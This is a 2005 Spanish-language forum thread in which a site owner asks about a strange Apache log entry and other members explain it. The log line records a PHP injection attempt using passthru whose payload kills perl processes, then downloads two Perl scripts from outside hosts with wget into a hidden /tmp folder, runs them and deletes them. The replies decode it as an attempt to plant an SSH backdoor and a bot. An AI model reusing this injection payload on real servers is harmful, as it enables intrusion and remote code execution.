Foros del Web » Administración de Sistemas » Seguridad y redes »

Log curioso

Estas en el tema de Log curioso en el foro de Seguridad y redes en Foros del Web. Que significa esto que halle en mi log de mi hosting [Thu Dec 30 05:41:03 2004] [error] [client 81.169.171.98] File does not exist: /usr/local/psa/home/vhosts/misitio.com/httpdocs/blog&rush=echo _START_; ...
  #1 (permalink)  
Antiguo 06/01/2005, 18:40
Avatar de Gerald  
Fecha de Ingreso: julio-2003
Mensajes: 1.356
Antigüedad: 21 años, 5 meses
Puntos: 2
Log curioso

Que significa esto que halle en mi log de mi hosting

[Thu Dec 30 05:41:03 2004] [error] [client 81.169.171.98] File does not exist: /usr/local/psa/home/vhosts/misitio.com/httpdocs/blog&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
__________________
Solo por Hoy: Trataré de fortalecer mi mente. Estudiaré y aprenderé algo útil
Hoteldipity
Arte Caracol
  #2 (permalink)  
Antiguo 06/01/2005, 21:30
Avatar de jariza  
Fecha de Ingreso: agosto-2003
Ubicación: Málaga
Mensajes: 1.449
Antigüedad: 21 años, 4 meses
Puntos: 10
Hola,

Yo no soy experto en esto, pero el log no tiene buena pinta. Parece como si hubiesen querido ejecutar comandos en tu máquina.
Esto es lo que yo veo:

killall -9 perl -> parar los procesos relacionados con PERL.
cd /tmp -> Se va al directorio tmp.
mkdir .temp22 -> Crea el directorio temp22 dentro de tmp.
cd .temp22 -> Se va al directorio creado.
wget http://www.abcft.org/themes/bot.htm -> Descarga el archivo bot.htm.
wget http://http://weblicious.com/.notes/ssh2.htm -> Descarga el arcivo ssh2.htm
perl ssh2.htm -> Ejecuta el script PERL ssh2.htm
rm ssh.htm -> Borra ssh.htm
perl bot.htm -> Ejecuta el script PERL bot.htm
rm bot.htm -> Borra bot.htm (script ejecutado).

Yo diría que están intentando dejar un acceso SSH a tu máquina y poner un bot (que algo hará).

... ¿o soy muy alarmista? ...

Me corrijan los maestros si me equivoco.

Saludos.

Última edición por jariza; 06/01/2005 a las 21:31
  #3 (permalink)  
Antiguo 07/01/2005, 06:33
Avatar de PatomaS
Colaborador
 
Fecha de Ingreso: marzo-2004
Ubicación: En alguna otra parte
Mensajes: 4.656
Antigüedad: 20 años, 9 meses
Puntos: 63
Hola

Pues la verdad es que así rapidamente yo diría algo muy parecido...

me choca la parada de cosas perl para luego llamarlo.

También me llama la atención que la ip reporta dos sitios completamente diferentes si hace un tracert y si se navega...

Pero bueno, ya ´dirán algo los expertos...

;)

Felicidad
__________________
¡ hey, hou, hou, hey !

Última edición por PatomaS; 07/01/2005 a las 06:37
  #4 (permalink)  
Antiguo 07/01/2005, 14:47
Avatar de Gerald  
Fecha de Ingreso: julio-2003
Mensajes: 1.356
Antigüedad: 21 años, 5 meses
Puntos: 2
Gracias a todos, este log , lo encontre en log de errores, en si no llegaron a lograr su cometido pero me dejo con la duda.
Gracias a Todos
__________________
Solo por Hoy: Trataré de fortalecer mi mente. Estudiaré y aprenderé algo útil
Hoteldipity
Arte Caracol
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 20:37.